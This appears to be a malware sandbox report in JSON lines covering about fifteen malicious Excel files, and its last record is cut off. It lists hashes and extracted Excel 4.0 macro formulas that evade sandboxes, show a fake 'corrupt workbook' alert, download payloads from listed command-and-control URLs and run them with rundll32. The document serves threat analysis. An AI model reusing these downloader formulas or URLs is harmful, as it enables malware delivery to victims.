{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b39948f16ff05f5cd0e0b5d87ee426a671c520affa09ad0c33a612e76643a1c"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b39948f16ff05f5cd0e0b5d87ee426a671c520affa09ad0c33a612e76643a1c","filesize":206336,"md5":"314d82ef33f02d980850e98e6c881121","sha1":"be4e4a3e4d00453cd3f896fa27945b6bf72041d7","sha256":"0b39948f16ff05f5cd0e0b5d87ee426a671c520affa09ad0c33a612e76643a1c","sha512":"abfe9ee3324f8c4b9c54b51e94c60b95e801d111451c7076cfdb1e797c380c7cc4040d3ae11e6d81d4350f076eb9a28262f57f0a46b09ac0557fe2ac5281e4ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b39948f16ff05f5cd0e0b5d87ee426a671c520affa09ad0c33a612e76643a1c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sP0gbZUnxb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b4e16469682fcd42972331cd7a8843e079ffd7173453ec89b2bccefa5eacd2b"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b4e16469682fcd42972331cd7a8843e079ffd7173453ec89b2bccefa5eacd2b","filesize":160768,"md5":"7014a53f4354cdc708dfa1244eff5748","sha1":"48fbf76d34d29b2cfeff1bdb56b1869b0a4ecfb0","sha256":"0b4e16469682fcd42972331cd7a8843e079ffd7173453ec89b2bccefa5eacd2b","sha512":"8abdfb38757c606ab78a3c19a1071196feeb6fddb1ee026067172b455122035fb2f5904ef1476767f346b1259c9ff4fc5c17e502f67bfc9797f2b616fc0dfacb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b4e16469682fcd42972331cd7a8843e079ffd7173453ec89b2bccefa5eacd2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3eLLU1grrJ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b5f7f6a39e168f3d21e0768dfab243d49d3bdbfa8b77b7fbdcf3f0c027d7cc7"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b5f7f6a39e168f3d21e0768dfab243d49d3bdbfa8b77b7fbdcf3f0c027d7cc7","filesize":168960,"md5":"5e07ca729c3a823805dc029502af5315","sha1":"7f44cc12ca4638c3fc13449bc94249bb42a36cea","sha256":"0b5f7f6a39e168f3d21e0768dfab243d49d3bdbfa8b77b7fbdcf3f0c027d7cc7","sha512":"90c181b5f77703de515e1be22ab0d63114311f7cd4578a57dad89ef90f429c3007a6d161c8d4b32a0cbd091eb626924512ef35fbb642e6ed18bd76afd9ad8656","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b5f7f6a39e168f3d21e0768dfab243d49d3bdbfa8b77b7fbdcf3f0c027d7cc7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FGhTL1FEZG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b60fdef08807ca802c4aa32a4cd23aa542fd64bc97fbd22d9f6905c7eb5134f"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b60fdef08807ca802c4aa32a4cd23aa542fd64bc97fbd22d9f6905c7eb5134f","filesize":167936,"md5":"7635284eec7f59392628ce8995e13dd2","sha1":"c2ec6fb0cf1ac062687d6f914a10ec6c888d7804","sha256":"0b60fdef08807ca802c4aa32a4cd23aa542fd64bc97fbd22d9f6905c7eb5134f","sha512":"0ccac1f4b8ea2da5bccb2942436072f7cbce50dae9c10696300a69207622f002d53036a7e5f51a895318d67c870c73ebc5218fedba8888ee022174866b3fecb5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b60fdef08807ca802c4aa32a4cd23aa542fd64bc97fbd22d9f6905c7eb5134f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WQ3L6yiR84\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b6d2eb4e0620f66ac1eeac70aee4accbaba43a3666efbbd27f1c87c1f589d6e"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b6d2eb4e0620f66ac1eeac70aee4accbaba43a3666efbbd27f1c87c1f589d6e","filesize":206336,"md5":"e89a0d98868dc406d3c87eb438b866e0","sha1":"85281788901f4dcfb7e80ebe22a5d0d104cdfe8f","sha256":"0b6d2eb4e0620f66ac1eeac70aee4accbaba43a3666efbbd27f1c87c1f589d6e","sha512":"1e8caae2b648f463b13812df46aeaa92e3328f5e6d22418bdcba9b70151a36fe4c2f3be37223e2b72655f7314e4a51f52c83de92760be6be901c47576de8f50b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b6d2eb4e0620f66ac1eeac70aee4accbaba43a3666efbbd27f1c87c1f589d6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o27XkgV6Pl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b708c57b4cdea5274c893fc2143d6d95fb7b51bc2f9b033506e058d89c66d8c"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b708c57b4cdea5274c893fc2143d6d95fb7b51bc2f9b033506e058d89c66d8c","filesize":112128,"md5":"4650da2a392168ebfd7f83b8e001215a","sha1":"7b8d0b770c8c470b6dd9527763257160f3b966c0","sha256":"0b708c57b4cdea5274c893fc2143d6d95fb7b51bc2f9b033506e058d89c66d8c","sha512":"c604d9fe8c3808366d6fe58e6ab41a5efb5fdfce63e72781161cebd9aef0dbd02a2465275d4cfb1666fa3d0d72402c682fde8c35bd2d43e4b7d26a9dacf1504f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b708c57b4cdea5274c893fc2143d6d95fb7b51bc2f9b033506e058d89c66d8c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b9b4ce00e36cfe1a9a88e0af3cce0b5e68ca6f049cd458d66935b26f687752b"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b9b4ce00e36cfe1a9a88e0af3cce0b5e68ca6f049cd458d66935b26f687752b","filesize":104448,"md5":"3581aa06caf89fa5c98d189182015ff9","sha1":"fdaa285bcbe38fc8752674c8711753d49519a545","sha256":"0b9b4ce00e36cfe1a9a88e0af3cce0b5e68ca6f049cd458d66935b26f687752b","sha512":"7e63ca5a914c26f42af6397a591c5b6690ca7756c1fa465c7fc64844c2823d740fbcd54bf2ea624775f251f6e42585ca2d6f41bb536ef6a820a31a6f964f7ab1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b9b4ce00e36cfe1a9a88e0af3cce0b5e68ca6f049cd458d66935b26f687752b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TKwETA63TZ\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ba24cc3b05d51b333299243b3e734c167b04b4a86077988116f625d3f8779bb"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0ba24cc3b05d51b333299243b3e734c167b04b4a86077988116f625d3f8779bb","filesize":206336,"md5":"aad38492e10419c2541a555fedcc8242","sha1":"2df7f46aa20dfe03c3a8387ee7b5a7add7f090ae","sha256":"0ba24cc3b05d51b333299243b3e734c167b04b4a86077988116f625d3f8779bb","sha512":"94567759783fc00809df5e553a212fe3cbcdae5ab1981fb05c6ab5faabf53fc8d814023c9f37b58754e35c553cc3d69a949607fff4a1f1b1e1ed23e373679b1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ba24cc3b05d51b333299243b3e734c167b04b4a86077988116f625d3f8779bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nXPuL0aC0o\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bb1ee095b826e2a33bae3f0cca1ad840f8a10eb981cef3bc495ba4dcaea6ad6"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bb1ee095b826e2a33bae3f0cca1ad840f8a10eb981cef3bc495ba4dcaea6ad6","filesize":142848,"md5":"3ddd2add42631dc93fa1475ae141d483","sha1":"0dfd837b0bd14ebd06b88957047624ed2b23d463","sha256":"0bb1ee095b826e2a33bae3f0cca1ad840f8a10eb981cef3bc495ba4dcaea6ad6","sha512":"a81991c72ecc87a1c59f1965cd0119a63dca0b54a3382add259447d76b9042af1689bc8ba9ad8a2e6ed570c537ade93181c5917ae2197f4e6027f9a622aa8a0c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bb1ee095b826e2a33bae3f0cca1ad840f8a10eb981cef3bc495ba4dcaea6ad6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ERoov9PEM5\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bba7a7c804895ac2e3260c16a8da89896704cee9a756c7bd4a4c8860fef449f"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bba7a7c804895ac2e3260c16a8da89896704cee9a756c7bd4a4c8860fef449f","filesize":170496,"md5":"670b5e147bf86c8a7b66b94422d57f12","sha1":"7c42e2bc4002926d9ce764221308c305de30f525","sha256":"0bba7a7c804895ac2e3260c16a8da89896704cee9a756c7bd4a4c8860fef449f","sha512":"f686a25b7adb3a7001d6af958924a323e03a4ce34f8b972cfe78985258ed1005b5d115265c44b4f77b7edf8b7181e04c80a200de34d316478457310d7ecf9845","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bba7a7c804895ac2e3260c16a8da89896704cee9a756c7bd4a4c8860fef449f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ct1VcDtrkb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bc4eb2d5f852ff9e5ce7ca213777a01cea82e740be8059d68bd0b6330a172d1"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bc4eb2d5f852ff9e5ce7ca213777a01cea82e740be8059d68bd0b6330a172d1","filesize":144384,"md5":"bdaee774a85923180c360ca2e560acd4","sha1":"6da61e619c2da069b6e711f8f6c26157046f5c56","sha256":"0bc4eb2d5f852ff9e5ce7ca213777a01cea82e740be8059d68bd0b6330a172d1","sha512":"dd2f7819a6aa858cc3738718f21c34805841081b67f0b6a39e8adea5f7c68eaf68f63d645190753df979908012be29686f20bf3d386495cb57765feebc38c70d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bc4eb2d5f852ff9e5ce7ca213777a01cea82e740be8059d68bd0b6330a172d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ZdKuB48de8\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bc60e8ec276969d6f7063ea3127f16592b333aba9da96116c48ddf34954772a"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bc60e8ec276969d6f7063ea3127f16592b333aba9da96116c48ddf34954772a","filesize":147968,"md5":"b9c6df9883a7bad5c21c7b322694e6cb","sha1":"7e039e589d34ad89bc91e2032e1f62ae7f366c2e","sha256":"0bc60e8ec276969d6f7063ea3127f16592b333aba9da96116c48ddf34954772a","sha512":"526e577ea6e9d255909830fb8cbd773f1b904b9e14503eebbca6c2ece5b5814eca699b6706ddc6c870759c4537ca4e5002e12c5393cc53138389ce6846442b3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bc60e8ec276969d6f7063ea3127f16592b333aba9da96116c48ddf34954772a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"Dit41Ywst4\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bd51c94ac8e542167ab1aa4236ab33239b2a3cf25636cc9ba4917a7fbd4f1b9"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bd51c94ac8e542167ab1aa4236ab33239b2a3cf25636cc9ba4917a7fbd4f1b9","filesize":171008,"md5":"7343ff756bda0d5aa4a4c499acda7d34","sha1":"49668484bd91a5c833fc3ae35a2f86f6e155fb15","sha256":"0bd51c94ac8e542167ab1aa4236ab33239b2a3cf25636cc9ba4917a7fbd4f1b9","sha512":"775ef9ee9e4cedb68faeb6b1809cbdbfc265d73b48108b411a60abeb44ef032a648ffc216ff795c0e559a9cb259463ff213e6fbd3f2142add0de978c1f333c7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bd51c94ac8e542167ab1aa4236ab33239b2a3cf25636cc9ba4917a7fbd4f1b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"u15MtyhLra\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bd8bb30a79eeb1c88c209047b617b039b76873953340c56f815e6975c415346"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0bd8bb30a79eeb1c88c209047b617b039b76873953340c56f815e6975c415346","filesize":206336,"md5":"0362a8801bb2441f9e4744e895da7305","sha1":"171b82f71e0c2de995b9c47c170c04d2820742f7","sha256":"0bd8bb30a79eeb1c88c209047b617b039b76873953340c56f815e6975c415346","sha512":"33e895b9383433b1897db8ea75d51e6376ffe2e144bbafd22d5f39bd9f7644264d0caa64240e88044667c19130af716f40eb5e203194bff4babac37782b5c239","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bd8bb30a79eeb1c88c209047b617b039b76873953340c56f815e6975c415346.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0yARmr1cbP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0bef40dd5adea40835b3a3b22feeb9744160356f037a027ac248d864bee9f0bf"},"analysis":{"reported":"2020-04-09T16:14:51Z","score":10},"files":[{"filename":"0bef40dd5adea40835b3a3b22feeb9744160356f037a027ac248d864bee9f0bf","filesize":167936,"md5":"e1f6e67a3bd73e9c8e28efc06c2bf440","sha1":"6525ff72176a9511c448ff68d9a5cf32075a20cd","sha256":"0bef40dd5adea40835b3a3b22feeb9744160356f037a027ac248d864bee9f0bf","sha512":"b44d815383240da489a0e27b91d402343b53fa61e7d126f494fa2d732db6d76a36f5deb464eb3974dbd3866c9a554cf9e6b75eac13cb8fafffa0600c113163fe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0bef40dd5adea40835b3a3b22feeb9744160356f037a027ac248d864bee9f0bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 